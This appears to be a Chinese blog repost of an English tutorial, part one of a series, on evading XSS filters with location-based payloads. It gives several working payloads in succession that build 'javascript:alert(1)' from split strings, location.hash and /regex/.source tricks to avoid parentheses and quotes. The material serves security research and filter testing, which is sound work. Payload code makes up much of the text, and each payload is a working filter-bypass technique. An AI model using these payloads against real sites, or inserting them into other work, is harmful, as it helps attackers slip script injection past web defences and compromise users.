【XSS技巧拓展】————21、Location Based Payloads – Part I

最新推荐文章于 2025-06-12 11:56:47 发布

转载最新推荐文章于 2025-06-12 11:56:47 发布 · 333 阅读

【渗透测试拓展】同时被 2 个专栏收录

108 篇文章

订阅专栏

XSS技巧拓展

33 篇文章

订阅专栏

本文探讨了在存在括号的XSS有效载荷中，如何避开检测并阻止XSS尝试的过滤器。通过使用JavaScript的document.location属性和一系列巧妙的字符串操作，作者演示了如何隐藏被标记的字符串部分，避免使用括号和引号，最终成功绕过常见的防御措施。

In researching a way to evade a filter which detects and blocks the XSS attempt in the presence of parentheses in a payload, I came to interesting solutions of this problem that will be shared in this post and its subsequent parts.

It’s worth to note that any encoding of the prohibited characters would not evade the filter.

To accomplish that I started to use the javascript document location property, which make possible the following raw payload, still not ready for evasion:

<svg/onload=location=‘javascript:alert(1)’>

(due to WP security issues regarding the “javascript:alert(1)”, to test this we need to copy & paste it here, *re-typing the quotes*)

This is easily flagged by any decent filter. So we have another trick, which hides the signature part (“javascript:” and “alert(1)”) in the hash part of the URL because it’s never sent to server:

<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)

(due to WP security issues regarding the “javascript:alert(1)”, to test this we need to copy & paste it here)

Result => javascript:alert(1)

The “location.hash.substr(1)” returns everything after the hash sign, which responds for the “location.hash.substr(0)”. The “location.hash” returns a string which is splitted by the “substr” method, hence the 0 and 1 parts.

But we are still using parentheses. So let’s work on it. In order to do that we will first bring the flagged strings back, but splitting them to avoid detection:

<svg/onload=location=‘javas’%2B‘cript:’%2B
‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)

Try it!

Result => javas + cript: + ale + rt + (1)

The %2B is the encoded plus (+) sign, because in its literal form it’s changed to a regular space by browser before submitting. So what we are doing here is adding 2 pieces of the “javascript:” string to another 2 pieces of “alert” string plus the content of the URL after the hash using the “location.hash.substr(1)”.

In order to avoid the quotes, we can use the “/string/.source” trick as follows:

<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)

Try it!

Result => javas + script: + ale + rt + (1)

Nice. But we are still using parentheses.

So we need another trick: changing it a little bit, parentheses are avoided completely:

<svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()

Try it!

Result => javas + cript: + ale + rt + ( + 1 + )

As “location.hash” returns a string and because in javascript language every string is an array, we make use of “location.hash[1]” and “location.hash[2]” to point to the positions 1 and 2, respectively, of the “location.hash” array.

Cool, we could stop here, right? Not if you are not allowed to use “[” and “]” as well.

So I had to face another problem. And that made me research a whole new set of payloads which will be explored in the next posts of the “Location Based Payloads”.

#hack2learn